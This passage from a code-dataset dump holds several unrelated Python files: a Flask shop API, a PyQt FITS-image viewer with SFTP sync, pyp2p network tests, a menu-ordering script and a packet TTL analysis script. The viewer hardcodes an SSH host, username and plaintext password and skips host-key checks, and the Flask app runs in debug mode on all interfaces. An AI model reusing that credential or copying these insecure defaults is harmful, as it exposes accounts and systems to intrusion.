dumps(l)\n\n\n#----------------------------------------------purchase-------------------------------\n\n\n@app.route('/purchase_product', methods=['POST'])\ndef flask_purchase_product():\n token = request.headers.get('Authorization',None)\n l = purchase_product(token)\n return dumps(l)\n\n@app.route('/review_By_time', methods=['POST'])\ndef flask_review_By_time():\n j = request.json\n token = request.args.get(\"token\")\n day = request.args.get(\"day\")\n l = 
review_By_time(token,day)\n return dumps(l)\n\n@app.route('/get_cost_By_Time', methods=['POST'])\ndef flask_get_cost_By_Time():\n j = request.json\n token = request.args.get(\"token\")\n day = request.args.get(\"day\")\n l = get_cost_By_Time(token,day)\n return dumps(l)\n\n@app.route('/get_record', methods=['GET'])\ndef flask_get_record():\n token = request.headers.get('Authorization',None)\n l = get_record(token)\n return dumps(l)\n#----------------------------------------------cart-------------------------------\n\n@app.route('/add_product_to_cart/', methods=['GET'])\ndef flask_add_product_to_cart(id):\n token = request.headers.get('Authorization',None)\n id=int(id)\n l = add_product_to_cart(token,id)\n return dumps(l)\n\n@app.route('/remove_product_from_cart/', methods=['DELETE'])\ndef flask_remove_product_from_cart(id):\n token = request.headers.get('Authorization',None)\n id=int(id)\n l = remove_product_from_cart(token,id)\n return dumps(l)\n\n@app.route('/get_cart', methods=['GET'])\ndef flask_get_cart():\n token = request.headers.get('Authorization',None)\n l = get_cart(token)\n return dumps(l)\n\n\n\n#----------------------------------------------recommend-------------------------------\n\n@app.route('/random_recommend', methods=['GET'])\ndef flask_random_recommend():\n number = request.headers.get('Numbers',None)\n number = int(number)\n l=random_recommendation(number) # return 10 product\n return dumps(l)\n\n@app.route('/product_recommendation/', methods=['GET'])\ndef flask_product_recommendation(id):\n id=int(id)\n number = request.headers.get('Numbers',None)\n l=product_recommendation(id,number) # return 10 product\n return dumps(l)\n\n\n@app.route('/buy_recommendation/', methods=['GET'])\ndef flask_buy_recommendation(id):\n id=int(id)\n number = request.headers.get('Numbers',None)\n l=buy_recommendation(id,number) # return 10 product\n return dumps(l)\n\n@app.route('/purchase_record_recommendation', methods=['GET'])\ndef flask_purchase_record_recommendation():\n token = request.headers.get('Authorization',None)\n number = request.headers.get('Numbers',None)\n number = int(number)\n l=purchase_record_recommendation(token,number) # return 10 product\n return dumps(l)\n\n#-----------------------------------------------search------------------------------------\n@app.route('/search', methods=['GET'])\ndef flask_search():\n search_word = request.headers.get('search_word',None)\n max_price = int(request.headers.get('max_price',None))\n min_price = int(request.headers.get('min_price',None))\n l = search(search_word,min_price,max_price)\n return dumps(l)\n\n@app.route('/search_with_token', methods=['GET'])\ndef flask_search_with_token():\n token = request.headers.get('Authorization',None)\n search_word = request.headers.get('search_word',None)\n max_price = request.headers.get('max_price',None)\n min_price = request.headers.get('min_price',None)\n l = search_with_token(token,search_word,min_price,max_price)\n return dumps(l)\n\n\n#-------------------------------------------cahtbot-----------------------------\n'''\n@app.route('/chatbot', methods=['GET'])\ndef flask_chatbot():\n j = request.json\n word=j['word']\n l=chatbot_handle(word)\n return dumps(l)\n'''\n@app.route('/chatbot', methods=['GET'])\ndef flask_chatbot():\n word = request.headers.get('word',None)\n l=chatbot_handle(word)\n return dumps(l)\n\n@app.route('/chatbot_get', methods=['GET'])\ndef flask_chatbot_get():\n l=load_chatDB()\n return dumps(l)\n\nif __name__ == '__main__':\n app.run('0.0.0.0', 
port=5000,debug=True)\n","sub_path":"RecommendWebsite/reed/Flask_all.py","file_name":"Flask_all.py","file_ext":"py","file_size_in_byte":10244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"57099401","text":"import pyqtgraph as pg\nfrom PyQt4 import QtCore, QtGui, uic\nimport os\nimport sys\nimport glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.figure import Figure\nfrom matplotlib.backends.backend_qt4agg import (\n FigureCanvasQTAgg as FigureCanvas,\n NavigationToolbar2QT as NavigationToolbar)\nfrom astropy.io import fits\nfrom sklearn.metrics import mean_squared_error\nfrom photutils.background import Background\nfrom photutils import detect_sources\nfrom photutils.utils import random_cmap\nfrom photutils import source_properties, properties_table\nimport paramiko\n\n# set directory\n#parentDir = r'K:\\Google Drive\\DESI\\protoDESI\\images\\fpc_data'\ndirRemote = r'/home/msdos/SBIG/'\ndirLocal = os.path.join(os.path.expanduser(\"~\"), 'Downloads', 'SBIG')\ndatasetID = ''\ndatasetDirRemote = os.path.join(dirRemote, datasetID)\ndatasetDirLocal = os.path.join(dirLocal, datasetID)\ndomain = 'desisti.kpno.noao.edu'\nusername = 'msdos'\npassword = 'MS-d0s'\nautosync = True\nprintEnabled = True\npg.mkQApp()\n\n#%% Define main window class from UI file\n\nuiPath = os.path.dirname(os.path.abspath(__file__))\nuiFile = os.path.join(uiPath, 'sti_gui.ui')\n[WindowTemplate, TemplateBaseClass] = uic.loadUiType(uiFile)\n\ndef compare_sets(sftp):\n \n setRemote = set(sftp.listdir(datasetDirRemote))\n listRemote = list(setRemote)\n listRemoteConverted = list(listRemote)\n for i in range(len(listRemote)):\n listRemoteConverted[i] = listRemoteConverted[i].replace(':','_')\n setRemoteConverted = set(listRemoteConverted)\n setLocal = set(os.listdir(datasetDirLocal))\n setTransferConverted = setRemoteConverted - (setRemoteConverted & setLocal)\n setTransfer = set(setTransferConverted)\n for filename in setTransferConverted:\n i = listRemoteConverted.index(filename)\n setTransfer.remove(listRemoteConverted[i])\n setTransfer.add(listRemote[i])\n return setTransfer\n\nclass ListeningHost(QtCore.QThread):\n \n emitter = QtCore.pyqtSignal(object)\n \n def __init__(self, sftp):\n \n self.newDataAvailable = False\n self.sftp = sftp\n QtCore.QThread.__init__(self)\n \n def run(self):\n \n while self.newDataAvailable is False:\n \n# print('Listening host is actively checking for new data...')\n setTransfer = compare_sets(self.sftp)\n\n if len(setTransfer) is 0:\n self.newDataAvailable = False\n else:\n self.newDataAvailable = True\n self.emitter.emit(None)\n \n# while self.newDataAvailable is True:\n# self.emitter.emit(None)\n\nclass MainWindow(TemplateBaseClass):\n \n def __init__(self):\n \n TemplateBaseClass.__init__(self)\n # super(MainWindow, self).__init__()\n \n # create the main window\n self.ui = WindowTemplate()\n self.ui.setupUi(self)\n #self.ui.plotBtn.clicked.connect(self.plot)\n self.show()\n self.setWindowTitle('ProtoDESI ST-i Focusing Viewer')\n self.ui.actionSync.triggered.connect(self.sync)\n \n # establish ssh\n self.open_ssh(domain, username, password) \n\n self.updateFileList()\n segFig = Figure()\n self.addmpl(segFig)\n # show first image initially\n if len(self.ui.listRaw) > 0:\n filename = self.ui.listRaw.item(0).text()\n self.updateRaw(filename)\n \n # configure listener\n self.listeningHost = ListeningHost(self.sftp)\n self.listeningHost.emitter.connect(self.receiver)\n self.listeningHost.start()\n 
self.msg('Listening host started.')\n \n def msg(self, text):\n \n self.ui.statusbar.showMessage(text)\n if printEnabled:\n print(text)\n \n def paramiko_sftp_progress(self, transferred, total):\n \n percentage = transferred/total*100\n total_mb = total/(1024**2)\n self.msg('{0:.2f}%, Total {1:.2f} MB \\r'.format(percentage, total_mb))\n# self.ui.statusbar.showMessage('{0:.2f}%, Total {1:.2f} MB \\r'.format(percentage, total_mb))\n\n \n def addmpl(self, fig):\n \n self.ui.canvas = FigureCanvas(fig)\n self.ui.segViewLayout.addWidget(self.ui.canvas)\n self.ui.canvas.draw()\n self.ui.toolbar = NavigationToolbar(self.ui.canvas, \n self.ui.segView, coordinates=True)\n self.ui.segViewLayout.addWidget(self.ui.toolbar)\n \n def rmmpl(self):\n self.ui.segViewLayout.removeWidget(self.ui.canvas)\n self.ui.canvas.close()\n self.ui.segViewLayout.removeWidget(self.ui.toolbar)\n self.ui.toolbar.close()\n\n def open_ssh(self, domain, user, pw):\n \n self.msg('Establishing SSH...')\n self.ssh = paramiko.SSHClient()\n self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n self.ssh.connect(domain, username=user, password=pw)\n \n self.msg('Establishing SFTP...')\n self.sftp = self.ssh.open_sftp()\n \n def sync(self):\n \n # respond to user click on sync button, and perform actual sync\n \n self.msg('Syncing new data to local drive...')\n \n if self.listeningHost.newDataAvailable:\n \n setTransfer = compare_sets(self.sftp)\n self.msg('Files to be transferred: ' + repr(setTransfer))\n \n for filename in setTransfer:\n self.msg('Transferring {} ...'.format(filename))\n filenameLocal = filename.replace(':', '_')\n try:\n self.sftp.get(\n os.path.join(datasetDirRemote, filename), \n os.path.join(datasetDirLocal, filenameLocal),\n callback = self.paramiko_sftp_progress\n )\n self.msg('Transfer is complete: {}.'.format(filename))\n except:\n self.msg('Skipping file: {}'.format(filename))\n pass\n \n self.listeningHost.newDataAvailable = False\n self.listeningHost.start()\n self.updateFileList()\n \n else:\n self.msg('No new data available for sync.')\n \n def receiver(self):\n \n # receiver for listener emitter\n if self.listeningHost.newDataAvailable:\n self.msg('New data available. Sync Now.')\n if autosync:\n self.msg('Autosync is on. 
Auto-syncing...')\n self.sync()\n else:\n self.msg('No new data available.')\n \n def updateFileList(self):\n \n self.msg('Updating file lists...')\n \n # filename patterns\n os.chdir(dirLocal)\n namePatternRaw = '**/*.fit*'\n imgEntries = glob.glob(namePatternRaw, recursive=True)\n\n # populate list raw\n self.ui.listRaw.clear()\n self.ui.listRaw.addItems(imgEntries)\n \n # populate list master\n self.ui.listMaster.clear()\n self.ui.listMaster.addItems(imgEntries)\n \n def updateRaw(self, filename):\n \n self.msg(repr('Showing image:'+ filename))\n filepath = os.path.join(dirLocal, filename)\n hdu = fits.open(filepath)[0]\n \n # display header\n self.ui.headerView.setCurrentFont(QtGui.QFont('Courier'))\n self.ui.headerView.setFontPointSize(9)\n self.ui.headerView.setPlainText(repr(hdu.header))\n \n # display image selected\n minlevel = np.amin(hdu.data)\n maxlevel = 2000\n self.ui.rawView.show()\n self.ui.rawView.setImage(np.rot90(hdu.data, -1))\n self.ui.rawView.setLevels(minlevel, maxlevel)\n #self.ui.rawView.autoLevels()\n\n def updatePhot(self, filename):\n \n filepath = os.path.join(datasetDirLocal, 'master', filename)\n hdu = fits.open(filepath)[0]\n data = hdu.data\n \n # display master preview\n self.msg('Showing master image:' + repr(filename))\n self.rmmpl()\n segFig = Figure()\n# cmapRand = random_cmap(segm.max+1, random_state=12345)\n axes = segFig.add_subplot(111)\n axes.imshow(data, origin='lower', cmap=plt.cm.gray)\n self.addmpl(segFig)\n\n # perform photometry\n self.msg('Performing aperture photometry...')\n self.aperture_photometry(filename)\n \n def aperture_photometry(self, filename):\n\n # aperture photometry from source segmentation\n \n # determine threshold for background detection\n # if LEDoff was used, get threshold from LEDoff/background\n filepath = os.path.join(datasetDirLocal, 'master', filename)\n filenameCombined = '\\t'.join(os.listdir(os.path.join(datasetDirLocal, 'master')))\n if 'master_ledoff_subtracted' in filename:\n self.msg('Using master_ledoff')\n # filepath = os.path.join(datasetDir, 'master', filename)\n hdu = fits.open(filepath)[0]\n data_subtracted = hdu.data\n # calculate threadhold\n ledoff_pred = np.mean(data_subtracted) * np.ones(data_subtracted.shape)\n mse = mean_squared_error(data_subtracted, ledoff_pred) \n rmse = np.sqrt(mse)\n threshold = 7.0 * rmse\n threshold_value = threshold\n \n # if no LEDoff was used, background subtraction is needed\n # there should exist no file named \"subtracted\"\n elif 'master.fit' in filenameCombined \\\n or 'master_normalised.fit' in filenameCombined:\n self.ui.statusbar.showMessage('Using master or master_normalised')\n \n # create preliminary mask \n \"\"\" make_source_mask not yet available in photutils v0.2.1\n wait for v0.3 release\n \"\"\"\n #from photutils import make_source_mask\n #masterMask = make_source_mask(master, snr=2, npixels=5, dilate_size=11)\n \n # background subtraction\n \"\"\" create 2D image of background and background rms and \n apply sigma-clipping to each region in the low-res \n background map to get mean, median, and std/rms. 
\n sigma-clipping is the most widely used method though not as \n good as using mask; still superior to robust standard \n deviation using median absolute deviation (MAD-STD)\n \"\"\"\n \n \n hdu = fits.open(filepath)[0]\n data = hdu.data\n if 'EXPTIME' in hdu.header:\n exptime = hdu.header['EXPTIME']\n else:\n exptime = hdu.header['EXPREQ']\n \n self.msg('Determining threshold for target detection...')\n # calculate threashold\n # [mean, median, std] = sigma_clipped_stats(master, sigma=3.0, iters=5)\n bkg = Background(data, (100, 100), filter_shape=(3, 3), method='median')\n # bkg = Background(master, (50, 50), filter_size=(3, 3), method='median')\n # plt.imshow(bkg.background, norm=normalisation, origin='lower', cmap=plt.cm.gray)\n plt.imshow(bkg.background, origin='lower', cmap=plt.cm.gray)\n [fig, ax] = plt.subplots(figsize=(8, 8))\n # make background-substracted image\n data_subtracted = data - bkg.background\n # plot\n plt.imshow(data_subtracted, origin='lower', cmap=plt.cm.gray)\n \n # save background subtracted image\n if 'master.fit' in filename:\n hdu_subtracted = fits.PrimaryHDU(data_subtracted)\n hdu_subtracted.writeto('master_subtracted.fits', clobber = True)\n elif 'master_normalised.fit' in filename:\n hdu_normalised_subtracted = fits.PrimaryHDU(data_subtracted)\n hdu_normalised_subtracted.writeto('master_normalised_subtracted.fits', clobber = True)\n \n # segmentation at a given sigma level, for regional properties\n threshold = 5.0 * bkg.background_rms # since data is background-subtracted\n threshold_value = threshold.flat[0]\n \n self.msg('Threshold for target detection is: ' + repr(threshold_value))\n # perform segmentation whether flat was available or not\n self.msg('Performing segmentation...')\n segm = detect_sources(data_subtracted, threshold, npixels=5)\n \n self.msg('Segmentation labels are:')\n self.msg((str(segm.labels)))\n # measure regional source properties from segmentation\n # the centroid is from image moments, already intensity-weighted\n self.msg('Measuring source properties')\n if 'bkg' in locals():\n props = source_properties(data_subtracted, segm,\n error = bkg.background_rms, background = bkg.background)\n elif 'master_ledoff_subtracted' in filenameCombined:\n filepath = os.path.join(datasetDirLocal, 'master', 'master_ledoff_subtracted.fits')\n hdu = fits.open(filepath)[0]\n master_ledoff_subtracted = hdu.data\n props = source_properties(data_subtracted, segm,\n error = master_ledoff_subtracted - np.mean(master_ledoff_subtracted),\n background = master_ledoff_subtracted)\n \n # instrumental magnitude = -2.5 * log10(flux)\n for i in range(len(props)):\n props[i].mag_instr = -2.5 * np.log10(props[i].source_sum/exptime)\n # source_sum are by definition background-subtracted already\n propsTableColumns = ['id', 'xcentroid', 'ycentroid', 'area', 'max_value',\n 'source_sum', 'mag_instr']\n # there are other properties available, see list of SourceProperties\n # http://photutils.readthedocs.io/en/latest/api/photutils.segmentation.SourceProperties.html#photutils.segmentation.SourceProperties\n \n propsTable = properties_table(props, columns = propsTableColumns)\n self.ui.statusbar.showMessage(repr(propsTable))\n \n # plot segmentated image\n self.rmmpl()\n segFig = Figure()\n cmapRand = random_cmap(segm.max+1, random_state=12345)\n axes = segFig.add_subplot(111)\n axes.imshow(segm, origin='lower', cmap=cmapRand)\n axes.plot(propsTable['xcentroid'], propsTable['ycentroid'], ls='none', color='red',\n marker='+', ms=10, lw=1.5)\n self.addmpl(segFig)\n \n # set 
properties table font and font size\n self.ui.tablePhot.setCurrentFont(QtGui.QFont('Courier'))\n self.ui.tablePhot.setFontPointSize(9)\n self.ui.tablePhot.setPlainText(repr(propsTable))\n \n self.msg('Photometry completed')\n# # plots for visualisation\n# \n# apertures = []\n# for prop in props:\n# position = (prop.xcentroid.value, prop.ycentroid.value)\n# a = prop.semimajor_axis_sigma.value * 3.0\n# b = prop.semiminor_axis_sigma.value * 3.0\n# theta = prop.orientation.value\n# apertures.append(EllipticalAperture(position, a, b, theta=theta))\n# norm = ImageNormalize(stretch=SqrtStretch())\n# fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(18, 18))\n# \n# if 'bkg' in locals():\n# ax1.imshow(master_subtracted, origin='lower', cmap='Greys_r', norm=norm)\n# else:\n# ax1.imshow(master_subtracted_normalised, origin='lower', cmap='Greys_r', norm=norm)\n# ax2.imshow(segm, origin='lower', cmap=cmapRand)\n# for aperture in apertures:\n# aperture.plot(color='blue', lw=1.5, alpha=0.5, ax=ax1)\n# aperture.plot(color='white', lw=1.5, alpha=1.0, ax=ax2)\n\n#%% Start Qt event loop unless running in interactive mode or using pyside\n\nmain = MainWindow()\n\nif __name__ == '__main__':\n\n if (sys.flags.interactive != 1) or not hasattr(QtCore, 'PYQT_VERSION'):\n \n def raw_item_changed(curr, prev):\n filename = curr.text()\n main.updateRaw(filename)\n \n def master_item_changed(curr, prev):\n filename = curr.text()\n main.updatePhot(filename)\n\n main.ui.listRaw.currentItemChanged.connect(raw_item_changed)\n main.ui.listMaster.currentItemChanged.connect(master_item_changed)\n \n QtGui.QApplication.instance().exec_()","sub_path":"pd_fpc_analyses_of_parker/sti_viewer_standalone/sti_gui.py","file_name":"sti_gui.py","file_ext":"py","file_size_in_byte":16449,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"220770798","text":"from unittest import TestCase\nfrom pyp2p.lib import *\nfrom pyp2p.dht_msg import DHT\nfrom pyp2p.net import *\nimport random\nfrom threading import Thread\nimport time\n\nclass test_net(TestCase):\n def test_00000004(self):\n # Test broadcast.\n nodes = [\n {\n \"port\": 40001,\n \"net\": None,\n \"thread\": None\n },\n {\n \"port\": 40002,\n \"net\": None,\n \"thread\": None\n },\n {\n \"port\": 40003,\n \"net\": None,\n \"thread\": None\n }\n ]\n\n def accept_cons(node):\n while node[\"net\"] != None:\n for con in node[\"net\"]:\n x = 1\n\n time.sleep(0.5)\n\n # Buld networks.\n for node in nodes:\n node[\"net\"] = Net(net_type=\"direct\", node_type=\"passive\", passive_port=node[\"port\"], debug=1)\n node[\"net\"].disable_forwarding()\n node[\"net\"].disable_bootstrap()\n node[\"net\"].disable_advertise()\n node[\"net\"].enable_duplicate_ip_cons = 1\n node[\"net\"].start()\n node[\"thread\"] = Thread(target=accept_cons, args=(node,))\n node[\"thread\"].start()\n\n \"\"\"\n Make connections.\n Note: duplicate connections will be rejected resulting in just one connection from one node to the other nodes.\n \"\"\"\n for our_node in nodes:\n for their_node in nodes:\n # Don't connect to ourself.\n if our_node == their_node:\n continue\n\n # Connect to them.\n our_node[\"net\"].add_node(get_lan_ip(), their_node[\"port\"], \"passive\")\n\n # Accept cons:\n for node in nodes:\n node[\"net\"].synchronize()\n\n # Check connection no.\n for node in nodes:\n assert(len(node[\"net\"]) >= 3)\n\n # Test broadcast.\n for node in nodes:\n node[\"net\"].broadcast(\"test\")\n\n # Check for broadcast response on node sockets\n # (Should be on all of 
them because of duplicate cons.\n for node in nodes:\n for con in node[\"net\"]:\n con.set_blocking(blocking=1, timeout=5)\n line = con.recv_line()\n assert(con.connected)\n assert(line == \"test\")\n\n # Close cons.\n for node in nodes:\n for con in node[\"net\"]:\n con.close()\n\n node[\"net\"].stop()\n\n # And ... stop threads.\n node[\"net\"] = None\n\n def test_00000001(self):\n # Test seen messages\n from pyp2p.net import rendezvous_servers\n net = Net(debug=1, nat_type=\"preserving\", node_type=\"simultaneous\", net_type=\"direct\")\n net.disable_advertise()\n net.disable_bootstrap()\n net.disable_duplicates()\n net.start()\n con = net.add_node(rendezvous_servers[0][\"addr\"], rendezvous_servers[0][\"port\"], \"passive\")\n\n # Test source TCP.\n con.send_line(\"SOURCE TCP\")\n con.send_line(\"SOURCE TCP 0\")\n time.sleep(2)\n replies = []\n for reply in con:\n replies.append(reply)\n\n print(replies)\n assert(len(replies) == 1)\n\n # Disable duplicates.\n clear_seen_messages()\n net.enable_duplicates = 1\n con.send_line(\"SOURCE TCP\")\n con.send_line(\"SOURCE TCP 0\")\n time.sleep(2)\n replies = []\n for reply in con:\n replies.append(reply)\n\n assert(len(replies) == 2)\n\n def test_00000003(self):\n # Test validate node\n net = Net(debug=1)\n net.disable_advertise()\n net.disable_bootstrap()\n assert(net.validate_node(\"127.0.0.1\") != 1)\n assert(net.validate_node(\"0.0.0.0\") != 1)\n assert(net.validate_node(get_lan_ip()) != 1)\n assert(net.validate_node(get_lan_ip(), net.passive_port) != 1)\n assert(net.validate_node(net.passive_bind) != 1)\n assert(net.validate_node(net.passive_bind, net.passive_port) != 1)\n assert(net.validate_node(get_wan_ip()) != 1)\n assert(net.validate_node(\"8.8.8.8\"))\n assert(net.validate_node(\"8.8.8.8\", 80000) != 1)\n net.stop()\n\n def test_00000002(self):\n # Test add node.\n net = Net(debug=1, nat_type=\"preserving\", node_type=\"simultaneous\", net_type=\"direct\")\n net.disable_advertise()\n net.disable_bootstrap()\n net.start()\n\n # Test passive outbound connection.\n net.add_node(forwarding_servers[0][\"addr\"], forwarding_servers[0][\"port\"], \"passive\")\n assert(len(net.outbound) == 1)\n assert(net.get_connection_no() == 1)\n cons = []\n for con in net:\n cons.append(con)\n assert(len(cons))\n\n # 162.218.239.6\n\n def threaded_add_node(node_ip, node_port, node_type, net, events):\n def add_node(node_ip, node_port, node_type, net, events):\n con = net.add_node(node_ip, node_port, node_type)\n if con != None:\n events[\"success\"](con)\n\n t = Thread(target=add_node, args=(node_ip, node_port, node_type, net, events))\n t.start()\n\n cons = []\n def success_wrapper(cons):\n def success(con):\n cons.append(con)\n\n return success\n\n events = {\n \"success\": success_wrapper(cons)\n }\n\n # Test active simultaneous connection.\n # NAT punching node 1:\n timeout = time.time() + 15\n threaded_add_node(\"192.187.97.131\", 0, \"simultaneous\", net, events)\n while not len(cons) and time.time() <= timeout:\n time.sleep(1)\n\n if not len(cons):\n timeout = time.time() + 15\n threaded_add_node(\"162.218.239.6\", 0, \"simultaneous\", net, events)\n\n while not len(cons) and time.time() < timeout:\n time.sleep(1)\n assert(0)\n\n if len(cons):\n for con in cons:\n con.close()\n\n def failure_notify(con):\n assert(0)\n\n def success_notify(con):\n con.close()\n\n # Test threading hasn't broken the timing.\n events = {\n \"failure\": failure_notify,\n \"success\": success_notify\n }\n\n # This is the not-NATed test node.\n 
net.unl.connect(\"AQAAAAAAAAAAAAAAAAAAAAAAAAAAc2dtRMUG79qiBu/aos6tMVYAAAAAWMYQkz0OjrI=\", events)\n\n assert(net.validate_node(forwarding_servers[0][\"addr\"], forwarding_servers[0][\"port\"]))\n\n net.stop()\n\n def test_queued_sim_open(self):\n # Test add node.\n net = Net(debug=1, nat_type=\"preserving\", node_type=\"simultaneous\", net_type=\"direct\")\n net.disable_advertise()\n net.disable_bootstrap()\n net.start()\n\n net.unl.connect(\"AQAAAAAAAAAAAAAAAAAAAAAAAAAAc2dtRMUG79qiBu/aoqg7O1YAAAAAGkXKuVrNDYE=\", events=None)\n net.unl.connect(\"AQAAAAAAAAAAAAAAAAAAAAAAAAAAc2dtRMWDYbvALwOowGU8O1YAAAAATYLXRfdc5tc=\", events=None)\n time.sleep(2)\n assert(len(net.unl.pending_sim_open) == 2)\n net.stop()\n\n","sub_path":"tests/test_net.py","file_name":"test_net.py","file_ext":"py","file_size_in_byte":7190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"520922188","text":"class Error(Exception):\n pass\nclass menu:\n def __init__(self):\n self.d={}\n def show(self):\n print(\"\\tMENU\\n\")\n for i in self.d:\n print(i,\" \",self.d[i])\n def add(self,st,p):\n self.d[st]=p\nclass order():\n def __init__(self,me):\n self.d1={}\n self.d=me.d\n def placeo(self,st1,qt):\n if(st1 in self.d):\n self.d1[st1]=qt\n else:\n raise (Error(st1,\" not in menu\"))\n def disporder(self):\n tot=0\n print(\"Order\\tQuantity\\tPrice\")\n for i in self.d1:\n print(i,\"\\t\",self.d1[i],\"\\t\\t\",self.d1[i]*self.d[i])\n tot+=self.d1[i]*self.d[i]\n print(\"\\nThe total cost is \",tot)\nc=menu()\nc.add(\"Idly\",20)\nfor i in range(1000):\n st1=str(input(\"Enter food item:\"))\n p1=int(input(\"Enter cost:\"))\n c.add(st1,p1)\n ch=str(input(\"Do you wish to continue adding(y/n):\"))\n if(ch=='n'):\n break\nc.show()\no=order(c)\nfor i in range(100):\n s=str(input(\"Enter order from the menu:\"))\n q=int(input(\"Enter quantity:\"))\n o.placeo(s,q)\n c1=str(input(\"Do you wish to order more(y/n):\"))\n if(c1=='n'):\n break\no.disporder()\n","sub_path":"order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"87651028","text":"import unittest\nimport clics\nimport csd\nimport datsemshift\nimport pollex\nimport prototai\nimport stedt\n\n\nclass Integration(unittest.TestCase):\n def test_clics(self):\n dust = clics.semshift(\"dust\")\n self.assertSetEqual(set(dust),\n {'ASH', 'EARTH (SOIL)', 'FOG', 'SMOKE (EXHAUST)', 'LAND', 'SAND', 'FLOUR', 'CLAY', 'MUD',\n 'CLOUD'})\n\n def test_csd(self):\n grape = csd.semshift(\"grape\")\n self.assertSetEqual(set(grape),\n {'raspberry', 'grapes', 'strawberry', 'mayhaws', 'strawberries', '[berry, grape]',\n 'berry, fruit', 'grape', 'berry, berries', 'chokecherry', 'berry', 'bullberry',\n 'blackberry'}\n )\n\n def test_pollex(self):\n chisel = pollex.semshift(\"chisel\")\n self.assertSetEqual(set(chisel), {'Tattooing stick bearing bones or needles', 'Tattooing chisel',\n \"Tattooer's serrated chisel of bird-bone\"})\n\n def test_prototai(self):\n tiger = prototai.semshift(\"tiger\")\n self.assertSetEqual(set(tiger), {'tiger'})\n\n def test_stedt(self):\n scorpion = stedt.semshift(\"scorpion\")\n self.assertSetEqual(set(scorpion),\n {'scorpion', 'scorpion [m-bug]', 'shrimp', 'scorpion / crab / shrimp', 'shrimp / scorpion',\n 'crab, crawfish'})\n\n def test_datsemshift(self):\n dss = datsemshift.DatSemShift()\n closed = dss.semshift(\"closed\")\n self.assertSetEqual(set(closed), {'dark (adj.)', 'strong (of liquid or 
smell)', 'cloudy'})\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":1730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"11075906","text":"import argparse\r\nimport sys\r\nimport os\r\nimport functools\r\nimport random\r\nimport statistics\r\n\r\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\r\n\r\nfrom IPAlgorithm import radix\r\nimport IPAlgorithm.MultiSourceTimedFlowAlgorithm\r\n\r\nfrom pyshark.packet import layer\r\nclass LayerFieldsContainer(layer.LayerFieldsContainer):\r\n def __new__(cls, main_field, *args, **kwargs):\r\n if hasattr(main_field, 'get_default_value'):\r\n obj = str.__new__(cls, main_field.get_default_value(), *args, **kwargs)\r\n else:\r\n obj = str.__new__(cls, main_field, *args, **kwargs)\r\n obj.fields = [main_field]\r\n return obj\r\nlayer.LayerFieldsContainer = LayerFieldsContainer\r\n\r\nTESTED_ASES = 10\r\n\r\ndef main(pickle_src, drop_rate, *args, **kwargs):\r\n packets, prefixes_set = IPAlgorithm.MultiSourceTimedFlowAlgorithm.get_packets_pcap(None, pickle_src)\r\n prefixes = list(prefixes_set)\r\n extract = getattr(IPAlgorithm.MultiSourceTimedFlowAlgorithm.MultiSourceTimedFlowAlgorithm, '_extract_ttl_diff')\r\n\r\n prefix_radix = radix.Radix()\r\n for prefix in prefixes:\r\n rnode = prefix_radix.add(prefix.exploded)\r\n rnode.data[\"count\"] = 0\r\n rnode.data[\"packets\"] = []\r\n\r\n for packet in packets:\r\n rnode = prefix_radix.search_best(packet.src.exploded)\r\n if rnode is None:\r\n continue\r\n rnode.data[\"count\"]+=1\r\n flow = functools.reduce(lambda x, y: str(x) + '-' + str(y),\r\n [packet.src, packet.src_port, packet.dst, packet.dst_port], packet)\r\n rnode.data[\"packets\"].append({'flow':flow, 'hop' : extract(packet.ttl)})\r\n\r\n top = {k : k.data['packets'] for k in prefix_radix.nodes() if k in sorted(prefix_radix.nodes(), key=lambda n:n.data['count'], reverse=True)[:TESTED_ASES]}\r\n\r\n # Remove flows\r\n all_flows, averages = calc_averages(top)\r\n number_to_remove = int(drop_rate * len(all_flows))\r\n removed_flows = random.sample(all_flows, number_to_remove)\r\n for AS, packets in top.items():\r\n new_packets = list(filter(lambda p: p['flow'] not in removed_flows, packets))\r\n top[AS] = new_packets\r\n\r\n _, new_averages = calc_averages(top)\r\n\r\n packet_variance = statistics.variance([averages[AS][0] - new_averages[AS][0] for AS in top])\r\n flow_variance = statistics.variance([averages[AS][1] - new_averages[AS][1] for AS in top])\r\n\r\n print(\"Packet variance: %f, Flow variance: %f\"%(packet_variance, flow_variance))\r\n\r\n\r\ndef calc_averages(ASToPackets):\r\n # Calculate flows and averages\r\n averages = {}\r\n all_flows = set()\r\n for AS in ASToPackets:\r\n packets = ASToPackets[AS]\r\n flows = set()\r\n flows_to_ttl = {}\r\n for packet in packets:\r\n flow = packet['flow']\r\n flows.add(flow)\r\n if flow not in flows_to_ttl:\r\n flows_to_ttl[flow] = packet['hop']\r\n\r\n all_flows = all_flows.union(flows)\r\n packet_average = sum(map(lambda packet: (packet['hop']), packets)) / len(packets)\r\n flows_average = sum([flows_to_ttl[flow] for flow in flows_to_ttl]) / len(flows_to_ttl)\r\n averages[AS] = (packet_average, flows_average)\r\n\r\n return all_flows, averages\r\n\r\n\r\nif (__name__ == \"__main__\"):\r\n parser = argparse.ArgumentParser()\r\n parser.add_argument('pickle_src', type=str)\r\n 
